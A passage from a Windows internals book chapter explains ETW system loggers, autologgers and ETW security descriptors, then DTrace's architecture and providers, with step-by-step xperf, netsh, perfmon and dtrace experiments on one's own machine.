keyword. The event keyword is stored in the CSV or EVTX
file.
5.
Use netsh.exe to produce an EVTX file with the following
command:
Click here to view code image
netsh trace convert input=process_trace.etl
output=process_trace.evtx dump=evtx
overwrite=yes
6.
Open the Event Viewer. On the console tree located in the
left side of the window, right-click the Event Viewer
(Local) root node and select Open Saved Logs. Choose the
just-created process_trace.evtx file and click Open.
7.
In the Open Saved Log window, you should give the log a
name and select a folder to display it. (The example
accepted the default name, process_trace and the default
Saved Logs folder.)
8.
The Event Viewer should now display each event located in
the log file. Click the Date and Time column for ordering
the events by Date and Time in ascending order (from the
oldest one to the newest). Search for ProcessStart with
Ctrl+F to find the event indicating the Notepad.exe process
creation:
9.
The ThreadWorkOnBehalfUpdate event, which has no
human-readable description, causes too much noise, and
you should get rid of it from the trace. If you click one of
those events and open the Details tab, in the System node,
you will find that the event belongs to the
WINEVENT_KEYWORD_ WORK_ON_BEHALF
category, which has a keyword bitmask set to
0x8000000000002000. (Keep in mind that the highest
16 bits of the keywords are reserved for Microsoft-defined
categories.) The bitwise NOT operation of the
0x8000000000002000 64-bit value is
0x7FFFFFFFFFFFDFFF.
10.
Close the Event Viewer and capture another trace with
XPERF by using the following command:
Click here to view code image
xperf -start TestSession -on Microsoft-Windows-Kernel-
Process:0x7FFFFFFFFFFFDFFF
-f c:\process_trace.etl
11.
Open Notepad or some other application and stop the trace
as explained in the “Listing processes activity using ETW”
experiment. Convert the ETL file to an EVTX. This time,
the obtained decoded log should be smaller in size, and it
does not contain ThreadWorkOnBehalfUpdate events.
System loggers
What we have described so far is how normal ETW sessions and providers
work. Since Windows XP, ETW has supported the concepts of system
loggers, which allow the NT kernel to globally emit log events that are not
tied to any provider and are generally used for performance measurements.
At the time of this writing, there are two main system loggers available,
which are represented by the NT kernel logger and Circular Kernel Context
Logger (while the Global logger is a subset of the NT kernel logger). The NT
kernel supports a maximum of eight system logger sessions. Every session
that receives events from a system logger is considered a system session.
To start a system session, an application makes use of the StartTrace API,
but it specifies the EVENT_TRACE_SYSTEM_LOGGER_MODE flag or the
GUID of a system logger session as input parameters. Table 10-16 lists the
system logger with their GUIDs. The EtwpStartLogger function in the NT
kernel recognizes the flag or the special GUIDs and performs an additional
check against the NT kernel logger security descriptor, requesting the
TRACELOG_GUID_ENABLE access right on behalf of the caller process
access token. If the check passes, ETW calculates a system logger index and
updates both the logger group mask and the system global performance
group mask.
Table 10-16 System loggers
IN
DE
X
Name
GUID
Symbol
0
NT kernel logger
{9e814aad-3204-11d2-
9a82-006008a86939}
SystemTraceC
ontrolGuid
1
Global logger
{e8908abc-aa84-11d2-
9a93-00805f85d7c6}
GlobalLogger
Guid
2
Circular Kernel
Context Logger
{54dea73a-ed1f-42a4-
af71-3e63d056f174}
CKCLGuid
The last step is the key that drives system loggers. Multiple low-level
system functions, which can run at a high IRQL (the Context Swapper is a
good example), analyzes the performance group mask and decides whether to
write an event to the system logger. A controller application can enable or
disable different events logged by a system logger by modifying the
EnableFlags bit mask used by the StartTrace API and ControlTrace API. The
events logged by a system logger are stored internally in the global
performance group mask in a well-defined order. The mask is composed of
an array of eight 32-bit values. Each index in the array represents a set of
events. System event sets (also called Groups) can be enumerated using the
Xperf tool. Table 10-17 lists the system logger events and the classification
in their groups. Most of the system logger events are documented at
https://docs.microsoft.com/en-us/windows/win32/api/evntrace/ns-evntrace-
event_trace_properties.
Table 10-17 System logger events (kernel flags) and their group
Name
Description
Group
ALL_FA
ULTS
All page faults including hard,
copy-on-write, demand-zero faults,
and so on
None
ALPC
Advanced Local Procedure Call
None
CACHE_
FLUSH
Cache flush events
None
CC
Cache manager events
None
CLOCKI
NT
Clock interrupt events
None
COMPA
CT_CSW
ITCH
Compact context switch
Diag
CONTM
EMGEN
Contiguous memory generation
None
CPU_CO
NFIG
NUMA topology, processor group,
and processor index
None
CSWITC
H
Context switch
IOTrace
DEBUG_
EVENTS
Debugger scheduling events
None
DISK_IO
Disk I/O
All except SysProf,
ReferenceSet, and
Network
DISK_IO
_INIT
Disk I/O initiation
None
DISPAT
CPU scheduler
None
CHER
DPC
DPC events
Diag, DiagEasy, and
Latency
DPC_QU
EUE
DPC queue events
None
DRIVER
S
Driver events
None
FILE_IO
File system operation end times
and results
FileIO
FILE_IO
_INIT
File system operation
(create/open/close/read/write)
FileIO
FILENA
ME
FileName (e.g., FileName
create/delete/rundown)
None
FLT_FAS
TIO
Minifilter fastio callback
completion
None
FLT_IO
Minifilter callback completion
None
FLT_IO_
FAILUR
E
Minifilter callback completion
with failure
None
FLT_IO_
INIT
Minifilter callback initiation
None
FOOTPR
INT
Support footprint analysis
ReferenceSet
HARD_F
AULTS
Hard page faults
All except SysProf
and Network
HIBERR
UNDOW
N
Rundown(s) during hibernate
None
IDLE_ST
ATES
CPU idle states
None
INTERR
UPT
Interrupt events
Diag, DiagEasy, and
Latency
INTERR
UPT_ST
EER
Interrupt steering events
Diag, DiagEasy, and
Latency
IPI
Inter-processor interrupt events
None
KE_CLO
CK
Clock configuration events
None
KQUEUE
Kernel queue enqueue/dequeue
None
LOADER
Kernel and user mode image
load/unload events
Base
MEMINF
O
Memory list info
Base, ResidentSet,
and ReferenceSet
MEMINF
O_WS
Working set info
Base and
ReferenceSet
MEMOR
Memory tracing
ResidentSet and
Y
ReferenceSet
NETWO
RKTRAC
E
Network events (e.g., tcp/udp
send/receive)
Network
OPTICA
L_IO
Optical I/O
None
OPTICA
L_IO_INI
T
Optical I/O initiation
None
PERF_C
OUNTER
Process perf counters
Diag and DiagEasy
PMC_PR
OFILE
PMC sampling events
None
POOL
Pool tracing
None
POWER
Power management events
ResumeTrace
PRIORIT
Y
Priority change events
None
PROC_T
HREAD
Process and thread create/delete
Base
PROFILE
CPU sample profile
SysProf
REFSET
Support footprint analysis
ReferenceSet
REG_HI
Registry hive tracing
None
VE
REGIST
RY
Registry tracing
None
SESSION
Session rundown/create/delete
events
ResidentSet and
ReferenceSet
SHOULD
YIELD
Tracing for the cooperative DPC
mechanism
None
SPINLO
CK
Spinlock collisions
None
SPLIT_I
O
Split I/O
None
SYSCAL
L
System calls
None
TIMER
Timer settings and its expiration
None
VAMAP
MapFile info
ResidentSet and
ReferenceSet
VIRT_A
LLOC
Virtual allocation reserve and
release
ResidentSet and
ReferenceSet
WDF_DP
C
WDF DPC events
None
WDF_IN
TERRUP
T
WDF Interrupt events
None
When the system session starts, events are immediately logged. There is
no provider that needs to be enabled. This implies that a consumer
application has no way to generically decode the event. System logger events
use a precise event encoding format (called NTPERF), which depends on the
event type. However, most of the data structures representing different NT
kernel logger events are usually documented in the Windows platform SDK.
EXPERIMENT: Tracing TCP/IP activity with the
kernel logger
In this experiment, you listen to the network activity events
generated by the System Logger using the Windows Performance
Monitor. As already introduced in the “Enumerating ETW
sessions” experiment, the graphical tool is not just able to obtain
data from the system performance counters but is also able to start,
stop, and manage ETW sessions (system session included). To
enable the kernel logger and have it generate a log file of TCP/IP
activity, follow these steps:
1.
Run the Performance Monitor (by typing perfmon in the
Cortana search box) and click Data Collector Sets, User
Defined.
2.
Right-click User Defined, choose New, and select Data
Collector Set.
3.
When prompted, enter a name for the data collector set (for
example, experiment), and choose Create Manually
(Advanced) before clicking Next.
4.
In the dialog box that opens, select Create Data Logs,
check Event Trace Data, and then click Next. In the
Providers area, click Add, and locate Windows Kernel
Trace. Click OK. In the Properties list, select Keywords
(Any), and then click Edit.
5.
From the list shown in the Property window, select
Automatic and check only net for Network TCP/IP, and
then click OK.
6.
Click Next to select a location where the files are saved. By
default, this location is
%SystemDrive%\PerfLogs\Admin\experiment\, if this is
how you named the data collector set. Click Next, and in
the Run As edit box, enter the Administrator account name
and set the password to match it. Click Finish. You should
now see a window similar to the one shown here:
7.
Right-click the name you gave your data collector set
(experiment in our example), and then click Start. Now
generate some network activity by opening a browser and
visiting a website.
8.
Right-click the data collector set node again and then click
Stop.
If you follow the steps listed in the “Decoding an ETL file”
experiment to decode the acquired ETL trace file, you will find that
the best way to read the results is by using a CSV file type. This is
because the System session does not include any decoding
information for the events, so the netsh.exe has no regular way to
encode the customized data structures representing events in the
EVTX file.
Finally, you can repeat the experiment using XPERF with the
following command (optionally replacing the C:\network.etl file
with your preferred name):
Click here to view code image
xperf -on NETWORKTRACE -f c:\network.etl
After you stop the system trace session and you convert the
obtained trace file, you will get similar events as the ones obtained
with the Performance Monitor.
The Global logger and Autologgers
Certain logger sessions start automatically when the system boots. The
Global logger session records events that occur early in the operating system
boot process, including events generated by the NT kernel logger. (The
Global logger is actually a system logger, as shown in Table 10-16.)
Applications and device drivers can use the Global logger session to capture
traces before the user logs in (some device drivers, such as disk device
drivers, are not loaded at the time the Global logger session begins.) While
the Global logger is mostly used to capture traces produced by the NT kernel
provider (see Table 10-17), Autologgers are designed to capture traces from
classic ETW providers (and not from the NT kernel logger).
You can configure the Global logger by setting the proper registry values
in the GlobalLogger key, which is located in the
HKLM\SYSTEM\CurrentControlSet\Control\WMI root key. In the same
way, Autologgers can be configured by creating a registry subkey, named as
the logging session, in the Autologgers key (located in the WMI root key).
The procedure for configuring and starting Autologgers is documented at
https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-
starting-an-Autologger-session.
As introduced in the “ETW initialization” section previously in this
chapter, ETW starts the Global logger and Autologgers almost at the same
time, during the early phase 1 of the NT kernel initialization. The
EtwStartAutoLogger internal function queries all the logger configuration
data from the registry, validates it, and creates the logger session using the
EtwpStartLogger routine, which has already been extensively discussed in
the “ETW sessions” section. The Global logger is a system logger, so after
the session is created, no further providers are enabled. Unlike the Global
logger, Autologgers require providers to be enabled. They are started by
enumerating each session’s name from the Autologger registry key. After a
session is created, ETW enumerates the providers that should be enabled in
the session, which are listed as subkeys of the Autologger key (a provider is
identified by a GUID). Figure 10-36 shows the multiple providers enabled in
the EventLog-System session. This session is one of the main Windows Logs
displayed by the Windows Event Viewer (captured by the Event Logger
service).
Figure 10-36 The EventLog-System Autologger’s enabled providers.
After the configuration data of a provider is validated, the provider is
enabled in the session through the internal EtwpEnableTrace function, as for
classic ETW sessions.
ETW security
Starting and stopping an ETW session is considered a high-privilege
operation because events can include system data that can be used to exploit
the system integrity (this is especially true for system loggers). The Windows
Security model has been extended to support ETW security. As already
introduced in previous sections, each operation performed by ETW requires a
well-defined access right that must be granted by a security descriptor
protecting the session, provider, or provider’s group (depending on the
operation). Table 10-18 lists all the new access rights introduced for ETW
and their usage.
Table 10-18 ETW security access rights and their usage
Value
Description
A
p
pl
ie
d
to
WMIGUID
_QUERY
Allows the user to query information about the trace
session
Se
ss
io
n
WMIGUID
_NOTIFIC
ATION
Allows the user to send a notification to the
session’s notification provider
Se
ss
io
n
TRACELO
G_CREAT
E_REALTI
ME
Allows the user to start or update a real-time session
Se
ss
io
n
TRACELO
G_CREAT
E_ONDISK
Allows the user to start or update a session that
writes events to a log file
Se
ss
io
n
TRACELO
G_GUID_E
NABLE
Allows the user to enable the provider
Pr
ov
id
er
TRACELO
G_LOG_E
VENT
Allows the user to log events to a trace session if the
session is running in SECURE mode
Se
ss
io
n
TRACELO
G_ACCES
S_REALTI
ME
Allows a consumer application to consume events in
real time
Se
ss
io
n
TRACELO
G_REGIST
ER_GUIDS
Allows the user to register the provider (creating the
EtwRegistration object backed by the
ETW_REG_ENTRY data structure)
Pr
ov
id
er
TRACELO
G_JOIN_G
ROUP
Allows the user to insert a manifest-based or
tracelogging provider to a Providers group (part of
the ETW traits, which are not described in this
book)
Pr
ov
id
er
Most of the ETW access rights are automatically granted to the SYSTEM
account and to members of the Administrators, Local Service, and Network
Service groups. This implies that normal users are not allowed to interact
with ETW (unless an explicit session and provider security descriptor allows
it). To overcome the problem, Windows includes the Performance Log Users
group, which has been designed to allow normal users to interact with ETW
(especially for controlling trace sessions). Although all the ETW access
rights are granted by the default security descriptor to the Performance Log
Users group, Windows supports another group, called Performance Monitor
Users, which has been designed only to receive or send notifications to the
session notification provider. This is because the group has been designed to
access system performance counters, enumerated by tools like Performance
Monitor and Resource Monitor, and not to access the full ETW events. The
two tools have been already described in the “Performance monitor and
resource monitor” section of Chapter 1 in Part 1.
As previously introduced in the “ETW Sessions” section of this chapter,
all the ETW security descriptors are stored in the
HKLM\System\CurrentControlSet\Control\Wmi\Security registry key in a
binary format. In ETW, everything that is represented by a GUID can be
protected by a customized security descriptor. To manage ETW security,
applications usually do not directly interact with security descriptors stored in
the registry but use the EventAccessControl and EventAccessQuery APIs
implemented in Sechost.dll.
EXPERIMENT: Witnessing the default security
descriptor of ETW sessions
A kernel debugger can easily show the default security descriptor
associated with ETW sessions that do not have a specific one
associated with them. In this experiment, you need a Windows 10
machine with a kernel debugger already attached and connected to
a host system. Otherwise, you can use a local kernel debugger, or
LiveKd (downloadable from https://docs.microsoft.com/en-
us/sysinternals/downloads/livekd.) After the correct symbols are
configured, you should be able to dump the default SD using the
following command:
Click here to view code image
!sd poi(nt!EtwpDefaultTraceSecurityDescriptor)
The output should be similar to the following (cut for space
reasons):
Click here to view code image
->Revision: 0x1
->Sbz1 : 0x0
->Control : 0x8004
SE_DACL_PRESENT
SE_SELF_RELATIVE
->Owner : S-1-5-32-544
->Group : S-1-5-32-544
->Dacl :
->Dacl : ->AclRevision: 0x2
->Dacl : ->Sbz1 : 0x0
->Dacl : ->AclSize : 0xf0
->Dacl : ->AceCount : 0x9
->Dacl : ->Sbz2 : 0x0
->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[0]: ->AceFlags: 0x0
->Dacl : ->Ace[0]: ->AceSize: 0x14
->Dacl : ->Ace[0]: ->Mask : 0x00001800
->Dacl : ->Ace[0]: ->SID: S-1-1-0
->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[1]: ->AceFlags: 0x0
->Dacl : ->Ace[1]: ->AceSize: 0x14
->Dacl : ->Ace[1]: ->Mask : 0x00120fff
->Dacl : ->Ace[1]: ->SID: S-1-5-18
->Dacl : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[2]: ->AceFlags: 0x0
->Dacl : ->Ace[2]: ->AceSize: 0x14
->Dacl : ->Ace[2]: ->Mask : 0x00120fff
->Dacl : ->Ace[2]: ->SID: S-1-5-19
->Dacl : ->Ace[3]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[3]: ->AceFlags: 0x0
->Dacl : ->Ace[3]: ->AceSize: 0x14
->Dacl : ->Ace[3]: ->Mask : 0x00120fff
->Dacl : ->Ace[3]: ->SID: S-1-5-20
->Dacl : ->Ace[4]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[4]: ->AceFlags: 0x0
->Dacl : ->Ace[4]: ->AceSize: 0x18
->Dacl : ->Ace[4]: ->Mask : 0x00120fff
->Dacl : ->Ace[4]: ->SID: S-1-5-32-544
->Dacl : ->Ace[5]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[5]: ->AceFlags: 0x0
->Dacl : ->Ace[5]: ->AceSize: 0x18
->Dacl : ->Ace[5]: ->Mask : 0x00000ee5
->Dacl : ->Ace[5]: ->SID: S-1-5-32-559
->Dacl : ->Ace[6]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[6]: ->AceFlags: 0x0
->Dacl : ->Ace[6]: ->AceSize: 0x18
->Dacl : ->Ace[6]: ->Mask : 0x00000004
->Dacl : ->Ace[6]: ->SID: S-1-5-32-558
You can use the Psgetsid tool (available at
https://docs.microsoft.com/en-us/sysinternals/downloads/psgetsid)
to translate the SID to human-readable names. From the preceding
output, you can see that all ETW access is granted to the SYSTEM
(S-1-5-18), LOCAL SERVICE (S-1-5-19), NETWORK SERVICE
(S-1-5-18), and Administrators (S-1-5-32-544) groups. As
explained in the previous section, the Performance Log Users
group (S-1-5-32-559) has almost all ETW access, whereas the
Performance Monitor Users group (S-1-5-32-558) has only the
WMIGUID_NOTIFICATION access right granted by the session’s
default security descriptor.
Click here to view code image
C:\Users\andrea>psgetsid64 S-1-5-32-559
PsGetSid v1.45 - Translates SIDs to names and vice versa
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Account for AALL86-LAPTOP\S-1-5-32-559:
Alias: BUILTIN\Performance Log Users
Security Audit logger
The Security Audit logger is an ETW session used by the Windows Event
logger service (wevtsvc.dll) to listen for events generated by the Security
Lsass Provider. The Security Lsass provider (which is identified by the
{54849625-5478-4994-a5ba-3e3b0328c30d} GUID) can be registered only
by the NT kernel at ETW initialization time and is never inserted in the
global provider’s hash table. Only the Security audit logger and Autologgers
configured with the EnableSecurityProvider registry value set to 1 can
receive events from the Security Lsass Provider. When the
EtwStartAutoLogger internal function encounters the value set to 1, it enables
the SECURITY_TRACE flag on the associated ETW session, adding the
session to the list of loggers that can receive Security audit events.
The flag also has the important effect that user-mode applications can’t
query, stop, flush, or control the session anymore, unless they are running as
protected process light (at the antimalware, Windows, or WinTcb level;
further details on protected processes are available in Chapter 3 of Part 1).
Secure loggers
Classic (MOF) and WPP providers have not been designed to support all the
security features implemented for manifest-based and tracelogging providers.
An Autologger or a generic ETW session can thus be created with the
EVENT_TRACE_SECURE_MODE flag, which marks the session as secure.
A secure session has the goal of ensuring that it receives events only from
trusted identities. The flag has two main effects:
■ Prevents classic (MOF) and WPP providers from writing any event to
the secure session. If a classic provider is enabled in a secure section,
the provider won’t be able to generate any events.
■ Requires the supplemental TRACELOG_LOG_EVENT access right,
which should be granted by the session’s security descriptor to the
controller application’s access token while enabling a provider to the
secure session.
The TRACE_LOG_EVENT access right allows a more-granular security to
be specified in a session’s security descriptor. If the security descriptor grants
only the TRACELOG_GUID_ENABLE to an untrusted user, and the ETW
session is created as secure by another entity (a kernel driver or a more
privileged application), the untrusted user can’t enable any provider on the
secure section. If the section is created as nonsecure, the untrusted user can
enable any providers on it.
Dynamic tracing (DTrace)
As discussed in the previous section, Event Tracing for Windows is a
powerful tracing technology integrated into the OS, but it’s static, meaning
that the end user can only trace and log events that are generated by well-
defined components belonging to the operating system or to third-party
frameworks/applications (.NET CLR, for example.) To overcome the
limitation, the May 2019 Update of Windows 10 (19H1) introduced DTrace,
the dynamic tracing facility built into Windows. DTrace can be used by
administrators on live systems to examine the behavior of both user programs
and of the operating system itself. DTrace is an open-source technology that
was developed for the Solaris operating system (and its descendant, illumos,
both of which are Unix-based) and ported to several operating systems other
than Windows.
DTrace can dynamically trace parts of the operating system and user
applications at certain locations of interest, called probes. A probe is a binary
code location or activity to which DTrace can bind a request to perform a set
of actions, like logging messages, recording a stack trace, a timestamp, and
so on. When a probe fires, DTrace gathers the data from the probe and
executes the actions associated with the probe. Both the probes and the
actions are specified in a script file (or directly in the DTrace application
through the command line), using the D programming language. Support for
probes are provided by kernel modules, called providers. The original
illumos DTrace supported around 20 providers, which were deeply tied to the
Unix-based OS. At the time of this writing, Windows supports the following
providers:
■ SYSCALL Allows the tracing of the OS system calls (both on entry
and on exit) invoked from user-mode applications and kernel-mode
drivers (through Zw* APIs).
■ FBT (Function Boundary tracing) Through FBT, a system
administrator can trace the execution of individual functions
implemented in all the modules that run in the NT kernel.
■ PID (User-mode process tracing) The provider is similar to FBT and
allows tracing of individual functions of a user-mode process and
application.
■ ETW (Event Tracing for Windows) DTrace can use this provider to
attach to manifest-based and TraceLogging events fired from the
ETW engine. DTrace is able to define new ETW providers and
provide associated ETW events via the etw_trace action (which is not
part of any provider).
■ PROFILE Provides probes associated with a time-based interrupt
firing every fixed, specified time interval.
■ DTRACE Built-in provider is implicitly enabled in the DTrace
engine.
The listed providers allow system administrators to dynamically trace
almost every component of the Windows operating system and user-mode
applications.
Note
There are big differences between the first version of DTrace for
Windows, which appeared in the May 2019 Update of Windows 10, and
the current stable release (distributed at the time of this writing in the May
2021 edition of Windows 10). One of the most notable differences is that
the first release required a kernel debugger to be set up to enable the FBT
provider. Furthermore, the ETW provider was not completely available in
the first release of DTrace.
EXPERIMENT: Enabling DTrace and listing the
installed providers
In this experiment, you install and enable DTrace and list the
providers that are available for dynamically tracing various
Windows components. You need a system with Windows 10 May
2020 Update (20H1) or later installed. As explained in the
Microsoft documentation (https://docs.microsoft.com/en-
us/windows-hardware/drivers/devtest/dtrace), you should first
enable DTrace by opening an administrative command prompt and
typing the following command (remember to disable Bitlocker, if it
is enabled):
bcdedit /set dtrace ON
After the command succeeds, you can download the DTrace
package from https://www.microsoft.com/download/details.aspx?
id=100441 and install it. Restart your computer (or virtual
machine) and open an administrative command prompt (by typing
CMD in the Cortana search box and selecting Run As
Administrator). Type the following commands (replacing
providers.txt with another file name if desired):
Click here to view code image
cd /d “C:\Program Files\DTrace”
dtrace -l > providers.txt
Open the generated file (providers.txt in the example). If
DTrace has been successfully installed and enabled, a list of probes
and providers (DTrace, syscall, and ETW) should be listed in the
output file. Probes are composed of an ID and a human-readable
name. The human-readable name is composed of four parts. Each
part may or may not exist, depending on the provider. In general,
providers try to follow the convention as close as possible, but in
some cases the meaning of each part can be overloaded with
something different:
■ Provider The name of the DTrace provider that is
publishing the probe.
■ Module If the probe corresponds to a specific program
location, the name of the module in which the probe is
located. The module is used only for the PID (which is not
shown in the output produced by the dtrace -l command)
and ETW provider.
■ Function If the probe corresponds to a specific program
location, the name of the program function in which the
probe is located.
■ Name The final component of the probe name is a name
that gives you some idea of the probe’s semantic meaning,
such as BEGIN or END.
When writing out the full human-readable name of a probe, all
the parts of the name are separated by colons. For example,
Click here to view code image
syscall::NtQuerySystemInformation:entry
specifies a probe on the NtQueryInformation function entry
provided by the syscall provider. Note that in this case, the module
name is empty because the syscall provider does not specify any
name (all the syscalls are implicitly provided by the NT kernel).
The PID and FBT providers instead dynamically generate probes
based on the process or kernel image to which they are applied
(and based on the currently available symbols). For example, to
correctly list the PID probes of a process, you should first get the
process ID (PID) of the process that you want to analyze (by
simply opening the Task Manager and selecting the Details
property sheet; in this example, we are using Notepad, which in the
test system has PID equal to 8020). Then execute DTrace with the
following command:
Click here to view code image
dtrace -ln pid8020:::entry > pid_notepad.txt
This lists all the probes on function entries generated by the PID
provider for the Notepad process. The output will contain a lot of
entries. Note that if you do not have the symbol store path set, the
output will not contain any probes generated by private functions.
To restrict the output, you can add the name of the module:
Click here to view code image
dtrace.exe -ln pid8020:kernelbase::entry
>pid_kernelbase_notepad.txt
This yields all the PID probes generated for function entries of
the kernelbase.dll module mapped in Notepad. If you repeat the
previous two commands after having set the symbol store path with
the following command,
Click here to view code image
set
_NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/dow
nload/symbols
you will find that the output is much different (and also probes
on private functions).
As explained in the “The Function Boundary Tracing (FBT) and
Process (PID) providers” section later in this chapter, the PID and
FBT provider can be applied to any offset in a function’s code. The
following command returns all the offsets (always located at
instruction boundary) in which the PID provider can generate
probes on the SetComputerNameW function of Kernelbase.dll:
Click here to view code image
dtrace.exe -ln pid8020:kernelbase:SetComputerNameW:
Internal architecture
As explained in the “Enabling DTrace and listing the installed providers”
experiment earlier in this chapter, in Windows 10 May 2020 Update (20H1),
some components of DTrace should be installed through an external package.
Future versions of Windows may integrate DTrace completely in the OS
image. Even though DTrace is deeply integrated in the operating system, it
requires three external components to work properly. These include both the
NT-specific implementation and the original DTrace code released under the
free Common Development and Distribution License (CDDL), which is
downloadable from https://github.com/microsoft/DTrace-on-
Windows/tree/windows.
As shown in Figure 10-37, DTrace in Windows is composed of the
following components:
■ DTrace.sys The DTrace extension driver is the main component that
executes the actions associated with the probes and stores the results
in a circular buffer that the user-mode application obtains via
IOCTLs.
■ DTrace.dll The module encapsulates LibDTrace, which is the DTrace
user-mode engine. It implements the Compiler for the D scripts, sends
the IOCTLs to the DTrace driver, and is the main consumer of the
circular DTrace buffer (where the DTrace driver stores the output of
the actions).
■ DTrace.exe The entry point executable that dispatches all the
possible commands (specified through the command line) to the
LibDTrace.
Figure 10-37 DTrace internal architecture.
To start the dynamic trace of the Windows kernel, a driver, or a user-mode
application, the user just invokes the DTrace.exe main executable specifying
a command or an external D script. In both cases, the command or the file
contain one or more probes and additional actions expressed in the D
programming language. DTrace.exe parses the input command line and
forwards the proper request to the LibDTrace (which is implemented in
DTrace.dll). For example, when started for enabling one or more probes, the
DTrace executable calls the internal dtrace_program_fcompile function
implemented in LibDTrace, which compiles the D script and produces the
DTrace Intermediate Format (DIF) bytecode in an output buffer.
Note
Describing the details of the DIF bytecode and how a D script (or D
commands) is compiled is outside the scope of this book. Interested
readers can find detailed documentation in the OpenDTrace Specification
book (released by the University of Cambridge), which is available at
https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-924.pdf.
While the D compiler is entirely implemented in user-mode in LibDTrace,
to execute the compiled DIF bytecode, the LibDtrace module just sends the
DTRACEIOC_ENABLE IOCTL to the DTrace driver, which implements the
DIF virtual machine. The DIF virtual machine is able to evaluate each D
clause expressed in the bytecode and to execute optional actions associated
with them. A limited set of actions are available, which are executed through
native code and not interpreted via the D virtual machine.
As shown earlier in Figure 10-37, the DTrace extension driver implements
all the providers. Before discussing how the main providers work, it is
necessary to present an introduction of the DTrace initialization in the
Windows OS.
DTrace initialization
The DTrace initialization starts in early boot stages, when the Windows
loader is loading all the modules needed for the kernel to correctly start. One
important part to load and validate is the API set file (apisetschema.dll),
which is a key component of the Windows system. (API Sets are described in
Chapter 3 of part 1.) If the DTRACE_ENABLED BCD element is set in the
boot entry (value 0x26000145, which can be set through the dtrace readable
name; see Chapter 12 for more details about BCD objects), the Windows
loader checks whether the dtrace.sys driver is present in the
%SystemRoot%\System32\Drivers path. If so, it builds a new API Set
schema extension named ext-ms-win-ntos-trace-l1-1-0. The schema targets
the Dtrace.sys driver and is merged into the system API set schema
(OslApiSetSchema).
Later in the boot process, when the NT kernel is starting its phase 1 of
initialization, the TraceInitSystem function is called to initialize the Dynamic
Tracing subsystem. The API is imported in the NT kernel through the ext-
ms-win-ntos-trace-l1-1-0.dll API set schema. This implies that if DTrace is
not enabled by the Windows loader, the name resolution would fail, and the
function will be basically a no op.
The TraceInitSystem has the important duty of calculating the content of
the trace callouts array, which contains the functions that will be called by
the NT kernel when a trace probe fires. The array is stored in the
KiDynamicTraceCallouts global symbol, which will be later protected by
Patchguard to prevent malicious drivers from illegally redirecting the flow of
execution of system routines. Finally, through the TraceInitSystem function,
the NT kernel sends to the DTrace driver another important array, which
contains private system interfaces used by the DTrace driver to apply the
probes. (The array is exposed in a trace extension context data structure.)
This kind of initialization, where both the DTrace driver and the NT kernel
exchange private interfaces, is the main motivation why the DTrace driver is
called an extension driver.
The Pnp manager later starts the DTrace driver, which is installed in the
system as boot driver, and calls its main entry point (DriverEntry). The
routine registers the \Device\DTrace control device and its symbolic link
(\GLOBAL??\DTrace). It then initializes the internal DTrace state, creating
the first DTrace built-in provider. It finally registers all the available
providers by calling the initialization function of each of them. The
initialization method depends on each provider and usually ends up calling
the internal dtrace_register function, which registers the provider with the
DTrace framework. Another common action in the provider initialization is
to register a handler for the control device. User-mode applications can
communicate with DTrace and with a provider through the DTrace control
device, which exposes virtual files (handlers) to providers. For example, the
user-mode LibDTrace communicates directly with the PID provider by
opening a handle to the \\.\DTrace\Fasttrap virtual file (handler).
The syscall provider
When the syscall provider gets activated, DTrace ends up calling the
KeSetSystemServiceCallback routine, with the goal of activating a callback
for the system call specified in the probe. The routine is exposed to the
DTrace driver thanks to the NT system interfaces array. The latter is
compiled by the NT kernel at DTrace initialization time (see the previous
section for more details) and encapsulated in an extension context data
structure internally called KiDynamicTraceContext. The first time that the
KeSetSystemServiceCallback is called, the routine has the important task of
building the global service trace table (KiSystemServiceTraceCallbackTable),
which is an RB (red-black) tree containing descriptors of all the available
syscalls. Each descriptor includes a hash of the syscall’s name, its address,
and number of parameters and flags indicating whether the callback is
enabled on entry or on exit. The NT kernel includes a static list of syscalls
exposed through the KiServicesTab internal array.
After the global service trace table has been filled, the
KeSetSystemServiceCallback calculates the hash of the syscall’s name
specified by the probe and searches the hash in the RB tree. If there are no
matches, the probe has specified a wrong syscall name (so the function exits
signaling an error). Otherwise, the function modifies the enablement flags
located in the found syscall’s descriptor and increases the number of the
enabled trace callbacks (which is stored in an internal variable).
When the first DTrace syscall callback is enabled, the NT kernel sets the
syscall bit in the global KiDynamicTraceMask bitmask. This is very
important because it enables the system call handler (KiSystemCall64) to
invoke the global trace handlers. (System calls and system service
dispatching have been discussed extensively in Chapter 8.)
This design allows DTrace to coexist with the system call handling
mechanism without having any sort of performance penalty. If no DTrace
syscall probe is active, the trace handlers are not invoked. A trace handler
can be called on entry and on exit of a system call. Its functionality is simple.
It just scans the global service trace table looking for the descriptor of the
system call. When it finds the descriptor, it checks whether the enablement
flag is set and, if so, invokes the correct callout (contained in the global
dynamic trace callout array, KiDynamicTraceCallouts, as specified in the
previous section). The callout, which is implemented in the DTrace driver,
uses the generic internal dtrace_probe function to fire the syscall probe and
execute the actions associated with it.
The Function Boundary Tracing (FBT) and Process
(PID) providers
Both the FBT and PID providers are similar because they allow a probe to be
enabled on any function entry and exit points (not necessarily a syscall). The
target function can reside in the NT kernel or as part of a driver (for these
cases, the FBT provider is used), or it can reside in a user-mode module,
which should be executed by a process. (The PID provider can trace user-
mode applications.) An FBT or PID probe is activated in the system through
breakpoint opcodes (INT 3 in x86, BRK in ARM64) that are written directly
in the target function’s code. This has the following important implications:
■ When a PID or FBT probe raises, DTrace should be able to re-execute
the replaced instruction before calling back the target function. To do
this, DTrace uses an instruction emulator, which, at the time of this
writing, is compatible with the AMD64 and ARM64 architecture. The
emulator is implemented in the NT kernel and is normally invoked by
the system exception handler while dealing with a breakpoint
exception.
■ DTrace needs a way to identify functions by name. The name of a
function is never compiled in the final binary (except for exported
